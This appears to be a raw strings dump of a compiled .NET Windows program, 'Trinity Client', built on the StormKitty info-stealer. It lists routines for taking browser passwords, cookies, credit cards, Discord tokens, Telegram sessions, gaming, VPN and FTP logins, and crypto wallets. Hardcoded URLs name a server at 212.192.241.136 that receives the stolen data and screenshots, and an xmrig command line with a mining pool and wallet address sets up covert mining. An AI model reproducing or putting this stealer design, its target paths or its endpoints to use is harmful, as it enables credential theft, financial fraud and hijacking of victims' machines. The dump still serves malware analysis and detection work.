!This program cannot be run in DOS mode.
`.rsrc
@.reloc
Y _c
Y _c
KDBM(
v4.0.30319
#Strings
__StaticArrayInitTypeSize=10
<CreateReport>b__10
CEB1CC71FC33A5B2E3A8E0727D334A0B236251779D5BAF438C965B4FB341F460
<>9__0_0
<Main>b__0_0
<>c__DisplayClass0_0
<Get>g__GetVaultElementValue|0_0
<>9__1_0
<StartMining>b__1_0
<CreateReport>b__0
28496878C202D72EEC073359CF7783F1765A4C5CDF405FA79CE14256F0D4E501
<CreateReport>b__11
2FAE78BDFE8022A734B50102E5AAAAD1BA2BB7AD72AAB6DECC21EF57D6DFE421
215470030B0DA49A7329BA30F0A38AD32EC6E7AAB0A17C2AB501FEFDD688A3D1
<CreateReport>b__1
List`1
746183F1318C28F724CFE8B949E669E523944C8C9123C416BFB2DB7832172A02
<CreateReport>b__12
3E471BEB9C4B699F9DBF2C4C30AD2DB5A2E93120A2AA6F2C4923FCC1BB456922
__StaticArrayInitTypeSize=32
Microsoft.Win32
UInt32
ReadInt32
ToInt32
5506141862EC002C0B6A1CE9E5133BEA4C9E2B0A2874B340618309782AFC7472
7FA01FA7C14EB995D3D3BEFA2652AC0FF088D5D7124283029658722E6FDD1F72
A4956ED9AA7996A00C7593BFFCBDB3FBE5A11F729876DF9AC5A1A33EF3EFE3A2
6D19E80E711937EC8EE72041A1BD75D33F4C76E03210863CD343F584F3CD07E2
<CreateReport>b__2
KeyValuePair`2
Dictionary`2
D3709EF761A0DEFC0ABE47CF9B3476718CE15F873291CF43E1AE3DC080DE5523
8B50B05A3346D82FE685DF445B7EE749C33B9BAA114363A578CEE3EDBACB7B43
D170DC7768D26A111EF0E7B910988BFC4ACBCA3BE6A5B476EED1F48C70040F93
489804EB6063B4C4D2E6D0B2D9E89A9AE050854562A681691C1A041E7B96D3C3
A8F810D24584EC3B7929D304606C2DD1E44F852CA90C291ED8CC398AA3F07FD3
<CreateReport>b__3
__StaticArrayInitTypeSize=64
ToInt64
<CreateReport>b__4
9F4785B3A7FCE2DB47B762BD03298BC60B643A91C35D994BB012774200919455
4957FD0951018A72CA86C078BC1F6B094E80D0CEF42ABDA6C07D7ED6BD14B775
<CreateReport>b__5
__StaticArrayInitTypeSize=16
ReadInt16
A981F5EDD35DDFF3F41F44A598272BBEAFA5F5B9C1595DC02FC6044CE81BE666
A515425C81DC183149AF8B446E168A9509399B54129E92DAC27E19364B0D7B86
5DE1095525AB303CB1757E42A4D855AFD36C459D66738BB6D29EC4EFDABF9EB6
064ACC46CE47C1A29B9D27B9D71B070821B627C96B594BAC77D236C37EC2CCE6
<CreateReport>b__6
CAB1D35DDB8E2426F9750F1040D87B301146E2BFAB7CF292C14EC1133A2ACB37
1B31AC76D464F22FCBDE794043D4533B09B5154FA12F2A510B042D64D7F674A7
VAULT_ITEM_WIN7
VaultGetItem_WIN7
<CreateReport>b__7
__StaticArrayInitTypeSize=38
42D76814205DCCDE199937F4024AFDD40F59A577C59AD64BBAF1511E31E09648
__StaticArrayInitTypeSize=48
00F45B18720CF90093967548198B72DB662917AB9D3BF26582BAC88BCEBABDB8
FD2AD7331099CFB7A118458E12965559ABF6D870A4B3DFF975FF43C3C56C09C8
get_UTF8
GetUTF8
VAULT_ITEM_WIN8
VaultGetItem_WIN8
<CreateReport>b__8
sNonUtf8
7D78CB380BF5EFB7B851409CA6A875F77DECF09D19B9149DA17A3EBF674BC0F9
625B1FA8EEFB9345CB2D80CDA3F78B5244D70DCB459672425C6AA7DD95FBB8F9
<CreateReport>b__9
<Module>
<PrivateImplementationDetails>
86D45C838620BD08CBFC6C4C730273D4BF33AD9593E495D84F08F858B511678A
2B38E92B45133A428979663D2C689C7151AA9D52DE967EC144A74261643F940B
A223DB41D9BFBC0280EBD0050A8BBD8EA7A943B251C8FD2D0B01A040462EDB0B
D61B7716B5AD4A42CC6C9300587B2C389EB40C3E8BF9B039E7DB98097247DC1B
143CDFB281A50A6468F7C1991D0FEDA05655ED447DACA6B3F3BCCA90446E723B
ACDF4A22C9359C1328E1CC966BC6C0D0D95B468AF46466FFAEC92C411050E17B
A25CC6D70519A408CEA3AE72EBFF915335C6E6E613B18720FA746D0D8056559B
BCRYPT_KEY_DATA_BLOB
0296D458811879A7CC04B6F85C52DEE81EE432EAD4E5765F051459B7F02CE1AC
7A769000E553478A16851DBBA454E822F03DB7C01B83809B4F5EC163F7D977BC
2758F11D171C684E6D95159D46260BE6438DAD2764618E91687E9E0AEAC641FC
8A11076CD284CF6F743D5D11778D242CBF3D91BCA53B6D43EE4DACF465E452FC
BCRYPT_KEY_DATA_BLOB_MAGIC
E0CFAA5A692BF7845AE59939493B0B96CCFFDACB3413C4CB3CD461DDE28C3D0D
0FAAA1B82B57C8DDDC82E0F99608244BE805FEF53B4B7CD47D6E398EDF3EBB7D
6C56BD00410C5FA60309B238EED42CFC1A6220172A54CD8D230165B65534A0BD
CE8979E74A40B6869BD5BED7E5610AA981486221166D6F6E65F3B34BF501B8DD
VAULT_SCHEMA_ELEMENT_ID
843991BD752E8C2C833B29AD5C915D1D94DC3F19FC14C1C8DCF720D5557A281E
BF8CAA158736480861E8F91826FFFA6545B27C3EC30153CA68330811329C2A8E
956066B197B0FDDE9C9C9D6DBCC411ECFBC0A9A012AC9BC2CD775065BB27DF9E
BCRYPT_CHAINING_MODE
4ACDF780C59C51FA1663A503E275650BA7099CACB51E54889D693D1316BF81EE
VAULT_ELEMENT_TYPE
ACDCB1AFB15194F894860BA7E2B85B91B6E5AB701407DFBAC51146F0C6E53B6F
84CDC3B9C7D6E1967A6EA1F24F2D6EEF32880F0874A2609A082EF83268D008EF
BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG
STATUS_AUTH_TAG_MISMATCH
BCRYPT_AUTH_TAG_LENGTH
BCRYPT_OBJECT_LENGTH
BCRYPT_CHAIN_MODE_GCM
BCRYPT_AES_ALGORITHM
BCRYPT_INIT_AUTH_MODE_INFO_VERSION
NordVPN
OpenVPN
ProtonVPN
BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO
BCRYPT_OAEP_PADDING_INFO
BCRYPT_PSS_PADDING_INFO
System.IO
BCRYPT_PAD_OAEP
GetPublicIP
GetLocalIP
SendARP
MS_PRIMITIVE_PROVIDER
ERROR_SUCCESS
UnLoadNSS
BCRYPT_PAD_PSS
BCRYPT_KEY_LENGTHS_STRUCT
BattleNET
VAULT_ITEM_ELEMENT
set_IV
value__
FileZilla
cbData
sWebData
pbData
DownloadData
ProtectedData
bEncryptedData
cbAuthData
pbAuthData
SECItemData
ScanData
sLoginData
tsData
CryptUnprotectData
GetTdata
lappdata
CopyLevelDb
mscorlib
DataBlob
github
System.Collections.Generic
get_sExpiresUtc
set_sExpiresUtc
SchemaId
schemaId
baseId
pszAlgId
diskId
videoId
biosId
SchemaElementId
get_CurrentThread
RijndaelManaged
LastModified
failed
Undefined
detected
bytesToBeDecrypted
encrypted
pReserved
System.Collections.Specialized
pPackageSid
vaultGuid
<sExpiresUtc>k__BackingField
<sPassword>k__BackingField
<sTitle>k__BackingField
<sName>k__BackingField
<sUsername>k__BackingField
<sIsSecure>k__BackingField
<sValue>k__BackingField
<sPath>k__BackingField
<sExpMonth>k__BackingField
<sUrl>k__BackingField
<sExpYear>k__BackingField
<sNumber>k__BackingField
<sBrowser>k__BackingField
<iCount>k__BackingField
<sKey>k__BackingField
<sHostKey>k__BackingField
RecordHeaderField
GetField
TrimEnd
ReadToEnd
AppEnd
method
FormatCreditCard
WriteDiscord
pPassword
get_sPassword
set_sPassword
FormatPassword
DecryptPassword
password
Replace
Service
IdentityReference
cbNonce
pbNonce
Resource
set_Mode
chainingMode
CryptoStreamMode
CipherMode
SelectSingleNode
XmlNode
Decode
get_Unicode
get_BigEndianUnicode
Base64Encode
VaultFree
FromImage
Stealer.Edge
cCookie
sCookie
FormatCookie
EndInvoke
BeginInvoke
ReadTable
ReadMasterTable
IDisposable
ToDouble
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
vaultHandle
Rectangle
Single
UploadFile
CopyDatabaseFile
ZipFile
logfile
sProfile
GetProfile
SetProfile
profile
Console
get_sTitle
set_sTitle
DetectTitle
GetActiveWindowTitle
hModule
set_WindowStyle
ProcessWindowStyle
GetCPUName
GetGPUName
get_Name
sProcName
get_StandardName
tableName
set_FileName
GetTempFileName
sFileName
GetFileName
fileName
get_MachineName
valueName
GetElementsByTagName
get_EnglishName
get_FullName
ItemName
GetWindowsVersionName
BrowserPathToAppName
get_UserName
get_sName
set_sName
sWalletName
GetHostName
pszCredentialFriendlyName
fnGetFriendlyName
GetDirectoryName
compname
get_sUsername
set_sUsername
username
hostname
DateTime
GetCreationTime
ReadLine
AppendLine
WriteLine
Combine
LocalMachine
get_CurrentTimeZone
localZone
DataProtectionScope
pszBlobType
DetectCreditCardType
ValueType
SECItemType
GetType
Compare
get_sIsSecure
set_sIsSecure
PtrToStructure
get_CurrentCulture
culture
Capture
ToTitleCase
database
Dispose
Truncate
MulticastDelegate
hashrate
TokenState
RecursiveDelete
SQLite
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
UnmanagedFunctionPointerAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ParamArrayAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
hMozGlue
GetBValue
GetIValue
GetLValue
GetSValue
get_Value
AppendValue
get_sValue
set_sValue
GetValue
DecryptValue
wmiMustBeTrue
get_IsAlive
SystemDrive
Remove
Trinity Client.exe
get_Size
cbSize
_pageSize
_sqlDataTypeSize
MaxAuthTagSize
get_BlockSize
set_BlockSize
chunkSize
get_KeySize
set_KeySize
Resize
SizeOf
get_ItemOf
IndexOf
authTag
GetFlag
get_Jpeg
DecryptConfig
System.Threading
ASCIIEncoding
_dbEncoding
System.Drawing.Imaging
Logging
Banking
StartMining
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
RandomString
ToString
HKLM_GetString
GetHexString
Substring
System.Drawing
ConvertToULong
IsMatch
ComputeHash
GetHash
GetCookiesDBPath
GetBookmarksDBPath
GetHistoryDBPath
MozillaPath
EdgePath
SkypePath
sSavePath
PidginPath
GetTempPath
CopyTempPath
GetFolderPath
sPrevBrowserPath
get_sPath
set_sPath
MinecraftPath
GetPswPath
get_Width
get_Length
dwMinLength
dwMaxLength
maxLength
length
EndsWith
StartsWith
get_sExpMonth
set_sExpMonth
VaultCli
PtrToStringUni
WinApi
AsyncCallback
callback
Facebook
GrabOutlook
bBookmark
FormatBookmark
AllocHGlobal
FreeHGlobal
Illegal
Marshal
System.Security.Principal
Paypal
cbLabel
pbLabel
SaveAll
kernel32.dll
user32.dll
crypt32.dll
vaultcli.dll
iphlpapi.dll
bcrypt.dll
MainWriteAutoFill
FormatAutoFill
Autofill
System.Xml
get_sUrl
set_sUrl
get_EndOfStream
CryptoStream
MemoryStream
Telegram
cAesGcm
TSECItem
get_Item
VaultGetItem
vaultItem
OperatingSystem
SymmetricAlgorithm
phAlgorithm
HashAlgorithm
Random
random
ICryptoTransform
RootNum
rowNum
Stealer.Chromium
toscan
Boolean
SECItemLen
physicalAddrLen
CopyFromScreen
get_PrimaryScreen
Pidgin
MessageBoxIcon
get_CurrentRegion
GetExtension
GetFileNameWithoutExtension
get_OSVersion
get_Version
GetSystemVersion
dwInfoVersion
GetBitVersion
GetBattleNETSession
GetSteamSession
GetSession
GetUplaySession
application
SystemInformation
pszImplementation
System.Globalization
System.Reflection
NameValueCollection
MatchCollection
GroupCollection
WebHeaderCollection
ManagementObjectCollection
CallingConvention
SearchOption
CryptographicException
IndexOutOfRangeException
UriFormatException
pszDescription
StringComparison
fpNssShutdown
CopyTo
CopyWalletFromDirectoryTo
CopyWalletFromRegistryTo
FieldInfo
FileInfo
CultureInfo
pPaddingInfo
SendSystemInfo
FileSystemInfo
RegionInfo
set_StartInfo
ProcessStartInfo
get_TextInfo
DirectoryInfo
Crypto
destIp
Bitmap
Ionic.Zip
TimeStamp
hwndApp
get_sExpYear
set_sExpYear
ToChar
macAddr
get_sNumber
set_sNumber
number
XmlReader
SqlReader
StreamReader
XmlTextReader
MD5CryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
provider
StringBuilder
sourceFolder
sLocalStateFolder
SpecialFolder
destFolder
Buffer
Filemanager
ManagementObjectSearcher
bCipher
SecurityIdentifier
identifier
Stealer
CommandHelper
ToUpper
Stealer.InternetExplorer
CurrentUser
Parser
get_sBrowser
set_sBrowser
GetDelegateForFunctionPointer
Counter
BitConverter
ToLower
sSaveDir
InitWorkDir
sWalletDir
get_Major
set_ForegroundColor
ConsoleColor
ResetColor
get_Minor
set_RedirectStandardError
Authenticator
separator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
.cctor
CreateDecryptor
passwordVaultPtr
ReadIntPtr
vaultElementPtr
Graphics
ScreenMetrics
System.Diagnostics
threads
MainWriteDownloads
get_Bounds
GetBounds
SaveMods
MainWriteCreditCards
cPasswords
MainWritePasswords
pPasswords
DetectedBankingServices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DetectServices
GetInstances
GrabberSourceCodes
DebuggingModes
get_ChildNodes
GrabberImages
Matches
cCookies
MainWriteCookies
DiscordDirectories
sWalletsDirectories
GetDirectories
_masterTableEntries
_tableEntries
GetDBFiles
CopyRequiredFiles
requiredFiles
SaveFiles
GetFiles
keyFiles
_fieldNames
GetSubKeyNames
CreditCardTypes
shares
GrabberDatabases
_fileBytes
Rfc2898DeriveBytes
ReadAllBytes
WriteAllBytes
GetBytes
saltBytes
dwPromptFlags
dwFlags
SendLogs
GetLogs
sGeckoBrowserPaths
sChromiumPswPaths
bBookmarks
cBookmarks
MainWriteBookmarks
sBookmarks
SavedWifiNetworks
Equals
cBrowserUtils
aFills
VaultEnumerateItems
System.Windows.Forms
lcDicordTokens
GetTokens
domains
Contains
cLogins
SaveVersions
GetTelegramSessions
System.Text.RegularExpressions
System.Collections
StringSplitOptions
RegexOptions
MessageBoxButtons
get_Groups
InvalidChars
GetInvalidPathChars
get_Headers
RuntimeHelpers
ResetCounters
sEncPass
wmiClass
ManagementClass
get_Success
success
Process
IPAddress
GetProcAddress
System.Net.Sockets
GetWallets
VaultEnumerateVaults
clients
pPropertyElements
GrabberDocuments
set_Arguments
GetAccounts
SaveScreenshots
get_Exists
FTPHosts
GetAntivirus
get_BatteryChargeStatus
get_PowerStatus
arrays
Concat
ImageFormat
ManagementBaseObject
hObject
ManagementObject
cbKeyObject
pbKeyObject
object
ondetect
Unprotect
CryptprotectPromptstruct
System.Net
ReadTableFromOffset
offset
Minecraft
get_Height
op_Explicit
fpNssInit
WaitForExit
cbSalt
VaultCloseVault
VaultOpenVault
get_Default
pcbResult
IAsyncResult
DialogResult
tsResult
result
UnsignedInt
StormKitty.Implant
Important
get_BatteryLifePercent
Trinity Client
Trinity_Client
WebClient
mailClient
smptClient
System.Management
pResourceElement
XmlElement
pAuthenticatorElement
get_DocumentElement
pIdentityElement
dwIncrement
SqlStatement
Environment
XmlDocument
get_Parent
GetParent
get_Current
iContent
FingerPrint
fingerPrint
get_Count
get_iCount
set_iCount
vaultItemCount
dwPropertiesCount
vaultCount
GetRowCount
GetRamAmount
SendScreenshot
WebcamScreenshot
DesktopScreenshot
GetPathRoot
pPrompt
szPrompt
cBCrypt
StringsCrypt
DPAPIDecrypt
fpPk11SdrDecrypt
BCryptDecrypt
EasyDecrypt
BCryptEncrypt
ThreadStart
TrimStart
AppStart
Convert
UnsignedShort
CreateReport
RemoveLatest
XmlNodeList
get_AddressList
get_Host
cbInput
pbInput
cbOutput
pbOutput
get_StandardOutput
set_RedirectStandardOutput
MoveNext
System.Text
ReadAllText
AppendAllText
WriteAllText
pPlainText
plainText
pCipherText
cipherText
get_InnerText
GetWindowText
cbMacContext
pbMacContext
get_Now
GetForegroundWindow
set_CreateNoWindow
datenow
endIdx
startIdx
startIndex
FFRegex
TokenRegex
MessageBox
Stealer.Firefox
ProtectedArray
ByteArray
InitializeArray
ToArray
get_Key
set_Key
OpenSubKey
DecryptWithKey
bMasterKey
GetMasterKey
sPrevMasterKey
get_sKey
set_sKey
ContainsKey
ProductKey
cryptKey
hImportKey
BCryptImportKey
get_sHostKey
set_sHostKey
BCryptDestroyKey
RegistryKey
System.Security.Cryptography
get_AddressFamily
BlockCopy
bEntropy
pEntropy
LoadLibrary
FreeLibrary
GetBattery
Recovery
get_Directory
AddDirectory
PasswordsStoreDirectory
CreateDirectory
sDirectory
SetCurrentDirectory
CopyDirectory
cHistory
MainWriteHistory
sHistory
FormatHistory
TableEntry
ZipEntry
SqliteMasterEntry
IPHostEntry
GetHostEntry
localCountry
GetCountry
GetInfoFromRegistry
sWalletsRegistry
sWalletRegistry
op_Equality
op_Inequality
Trinity
System.Security
Identity
IsNullOrEmpty
wmiProperty
BCryptSetAlgorithmProperty
BCryptGetProperty
BCryptSetProperty
pszProperty
StormKitty
WrapNonExceptionThrows
Trinity Client
Copyright
2021
$40a95495-ac33-41dc-a7f9-1102304089ba
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName .NET Framework 4 Client Profile
C:\Users\Test\Desktop\Trinity Botnet\Trinity Client\Trinity Client\obj\Release\Trinity Client.pdb
_CorExeMain
mscoree.dll
'\e(8iY
mhttps://github.com/LimerBoy/StormKitty
L[a2/A?
^B09SH
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
N&O&P&Q&R&S*T*U*V*W/X7Y7ZD[D\D]D^D_D
Started Threads.
Getting System Info.
SCREEN
ACTIVE
Region
COUNTRY
HASHRATE
THREADS
SHARES
http://212.192.241.136/trinity%20server/main_api.php
Uploaded System Info.
C:\ProgramData\
http://212.192.241.136/trinity%20server/screen_api.php
Uploaded Screenshot.
SOFTHWID
change
PASSWORDS
COOKIES
http://212.192.241.136/trinity%20server/stealer_api.php
Uploaded Passwords.
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
CSDVersion
Microsoft
Microsoft
root\CIMV2
SELECT * FROM Win32_Processor
Unknown
SELECT * FROM Win32_VideoController
Select * From Win32_ComputerSystem
TotalPhysicalMemory
Not Found
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Not installed
http://ip-api.com/json/?fields=status,country,countryCode
yyyy-MM-dd h:mm:ss tt
BASE >>
DISK >>
VIDEO >>
Win32_Processor
UniqueId
ProcessorId
Manufacturer
MaxClockSpeed
Win32_BIOS
SMBIOSBIOSVersion
IdentificationCode
SerialNumber
ReleaseDate
Version
Win32_DiskDrive
Signature
TotalHeads
Win32_BaseBoard
Win32_VideoController
DriverVersion
Win32_NetworkAdapterConfiguration
MACAddress
IPEnabled
google
yandex
duckduckgo
wallet
exchange
paypal
coinbase
blockchain
credit
shcwab
creditunion
federal
savings
capital
central
century
citizens
commercial
community
farmers
franklin
heritage
liberty
merchants
metropolitan
mutual
national
pacific
peoples
premier
progress
republic
security
united
valley
washington
western
facebook
twitter
telegram
discord
protonmail
outlook
hotmail
Amex Card
^3[47][0-9]{13}$
BCGlobal
^(6541|6556)[0-9]{12}$
Carte Blanche Card
^389[0-9]{11}$
Diners Club Card
^3(?:0[0-5]|[68][0-9])[0-9]{11}$
Discover Card
6(?:011|5[0-9]{2})[0-9]{12}$
Insta Payment Card
^63[7-9][0-9]{13}$
JCB Card
^(?:2131|1800|35\\d{3})\\d{11}$
KoreanLocalCard
^9[0-9]{15}$
Laser Card
^(6304|6706|6709|6771)[0-9]{12,15}$
Maestro Card
^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$
Mastercard
5[1-5][0-9]{14}$
Solo Card
^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$
Switch Card
^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$
Union Pay Card
^(62[0-9]{14,17})$
Visa Card
4[0-9]{12}(?:[0-9]{3})?$
Visa Master Card
^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$
Express Card
3[47][0-9]{13}$
(No data)
Report created
Failed to create report, error:
UNIQUE
Stealer >> Failed recursive remove directory with passwords
Url: {0}
User: {1}
Password: {2}
Type: {0}
Number: {1}
Exp: {2}
Holder: {3}
HostKey: {0}
Path: {1}
(UTC)Expires: {2}
Name: {3}
Value: {4}
Name: {0}
Value: {1}
URL: {0}
Title: {1}
Visits: {2}
Title: {0}
URL: {1}
Title: {0}
\Passwords.txt
\Credit Cards.txt
\Bookmarks.txt
\History.txt
\Cookies.txt
\AutoFill.txt
\Downloads.txt
BCrypt.BCryptDecrypt() (get size) failed with status code: {0}
BCrypt.BCryptDecrypt(): authentication tag mismatch
BCrypt.BCryptDecrypt() failed with status code:{0}
BCrypt.BCryptOpenAlgorithmProvider() failed with status code:{0}
BCrypt.BCryptSetAlgorithmProperty(BCrypt.BCRYPT_CHAINING_MODE, BCrypt.BCRYPT_CHAIN_MODE_GCM) failed with status code:{0}
BCrypt.BCryptImportKey() failed with status code:{0}
BCrypt.BCryptGetProperty() (get size) failed with status code:{0}
BCrypt.BCryptGetProperty() failed with status code:{0}
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
Microsoft Primitive Provider
\FileZilla\
recentservers.xml
sitemanager.xml
Server
ftp://
Filezilla >> Failed collect passwords
Url: {0}
Username: {1}
Password: {2}
\Hosts.txt
BattleNET >> Session not found
*.config
Battle.net
BattleNET >> Failed copy file
BattleNET >> Error
versions
\versions.txt
VERSION:
DATE:
bytes
\mods.txt
SIZE:
screenshots
\screenshots
\screenshots\
profile
options
servers
.minecraft
Software\Valve\Steam
SteamPath
Installed
Running
Updating
\Apps.txt
Application
GameID:
Installed:
Running:
Updating:
Steam >> Failed collect steam apps
\ssnf\
Steam >> Failed collect steam .ssnf files
config
\configs
\configs\
Steam >> Failed collect steam configs
RememberPassword
Autologin User:
AutoLoginUser
Remember password:
\SteamInfo.txt
Steam >> Failed collect steam info
Uplay >> Session not found
Uplay >> Error
Ubisoft Game Launcher
\tokens.txt
Authorization
Unauthorized
Token is valid
Token is invalid
Connection error
[a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
Discord\Local Storage\leveldb
Discord PTB\Local Storage\leveldb
Discord Canary\leveldb
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
SMTP Email Address
SMTP Server
POP3 Server
POP3 User Name
SMTP User Name
NNTP Email Address
NNTP User Name
NNTP Server
IMAP Server
IMAP User Name
HTTP User
HTTP Server URL
POP3 User
IMAP User
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
\Outlook.txt
Password
{0}: {1}
^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
^(?!:\/\/)([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
\chatlogs
Pidgin >> Failed to collect chat logs
accounts.xml
Protocol:
Username:
Password:
\accounts.txt
Pidgin >> Failed to collect accounts
.purple
Local Storage
\Local Storage
Microsoft\Skype for Desktop
\Telegram Desktop\tdata
usertag
settings
key_data
NordVPN
NordVpn.exe*
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
Password:
OpenVPN Connect\profiles
\profiles
profiles\
ProtonVPN
ProtonVPN.exe
\user.config
Wallets >> Failed collect wallets
Software
strDataDir
\wallets
Wallets >> Failed collect wallet from registry
\Zcash
Armory
\Armory
Bytecoin
\bytecoin
\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Exodus
\Exodus\exodus.wallet
Ethereum
\Ethereum\keystore
Electrum
\Electrum\wallets
AtomicWallet
\atomic\Local Storage\leveldb
Guarda
\Guarda\Local Storage\leveldb
Coinomi
\Coinomi\Coinomi\wallets
Litecoin
Bitcoin
\InternetExplorer
\InternetExplorer\Passwords.txt
Internet Explorer >> Failed to get passwords
[ERROR] Unable to enumerate vaults. Error (0x
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
SchemaId
pResourceElement
pIdentityElement
pPackageSid
pAuthenticatorElement
\Profiles
\places.sqlite
Firefox >> Failed to find bookmarks
moz_bookmarks
Firefox >> bookmarks collection failed
\cookies.sqlite
moz_cookies
Firefox >> cookies collection failed
\mozglue.dll
\nss3.dll
NSS_Init
PK11SDR_Decrypt
NSS_Shutdown
Firefox decryptor >> Failed to load NSS
\Profiles\
Firefox >> Failed to recover data
Firefox >> Failed to find history
moz_places
Firefox >> history collection failed
Firefox >> Failed to copy logins
logins.json
key3.db
key4.db
\logins.json
Firefox >> Failed to find profile
Firefox >> Failed to copy files to decrypt passwords
,"logins":\[
,"potentiallyVulnerablePasswords"
Firefox >> Failed collect passwords
Program Files\Mozilla Firefox
Users\Public
cert9.db
autofill
Edge >> Failed collect autofill
"bookmark_bar": {
"other": {
"name": "
"type": "url",
"url": "http
Failed to parse url
Edge >> Failed collect bookmarks
credit_cards
Edge >> Failed collect credit cards
\Login Data
\Web Data
\Bookmarks
\Cookies
\History
\CreditCards.txt
Chromium >> Failed collect autofill data
Chromium >> Failed collect bookmarks data
\Opera Stable\Local State
\Local State
"encrypted_key":"(.*?)"
Opera Software
cookies
Chromium >> Failed collect cookies
Chromium >> Failed collect credit cards
downloads
Chromium >> Failed collect downloads
Chromium >> Failed collect history
logins
Chromium >> Failed collect passwords
cmd.exe
StormKitty-Latest.log
Unknown System
SELECT * FROM win32_operatingsystem
HARDWARE\Description\System\CentralProcessor\0
Identifier
(32 Bit)
(64 Bit)
(Unknown)
No network adapters with an IPv4 address in the system!
SystemInfo >> GetPublicIP : Request error
Request failed
CRYPTED:
This application was unable to start correctly (0xc0000007b).
Click OK to close the application.
Application Error
WinRing0x64.sys
http://127.0.0.1/WinRing0x64.sys
xmrig.exe
http://127.0.0.1/xmrig.exe
--print-time 15 -p trinity-miner --donate-level 5 -o pool.supportxmr.com:443 -u 89UyhNJWGyP6xoycGBA3A6HjdNEs7g3jr34EXVtqGYzg5wLEbmZY2AcGy5Kw5NRfjaYTUyW1dKCHGinv7fGMg45zVCRQwNM -k --tls
accepted
completed jobs
READY threads
threads
speed 10s/60s/15m
\Browsers
\Messenger\Discord
\Messenger\Pidgin
\Messenger\Outlook
\Messenger\Skype
\Messenger\Telegram
\Gaming\Steam
\Gaming\Uplay
\Gaming\Battle.NET
\Gaming\Minecraft
\Crypto Wallets
\FileZilla
\VPN\ProtonVPN
\VPN\OpenVPN
\VPN\NordVPN
"hostname":"([^"]+)"
"encryptedUsername":"([^"]+)"
"encryptedPassword":"([^"]+)"
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Trinity Client
FileVersion
1.0.0.0
InternalName
Trinity Client.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
Trinity Client.exe
ProductName
Trinity Client
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0